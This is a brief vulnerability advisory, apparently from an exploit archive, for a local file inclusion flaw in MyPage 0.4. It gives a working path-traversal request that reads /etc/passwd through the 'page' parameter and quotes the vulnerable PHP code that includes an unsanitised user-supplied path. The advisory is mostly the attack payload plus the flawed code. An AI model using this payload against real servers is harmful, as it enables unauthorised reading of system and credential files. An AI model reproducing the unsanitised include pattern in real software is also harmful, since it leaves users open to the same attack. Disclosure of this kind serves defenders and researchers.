MyPage version 0.4 suffers from a local file inclusion vulnerability.
2c2b9c5998bf2d4f00b79f9af33ab48be08d8f1b1ad148f593fbccf18c31bfd6#############################################################
# mypage0.4 LFI Vulnerability
# Author: BAYBORA
# Site: www.1923turk.biz<http://www.1923turk.biz>
##############################################################
# Exploit:
Vuln file: index.php?page=LFI
Exploit:
POST http://server/index.php?page=../../../../../../../../etc/passwd
index.php
if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed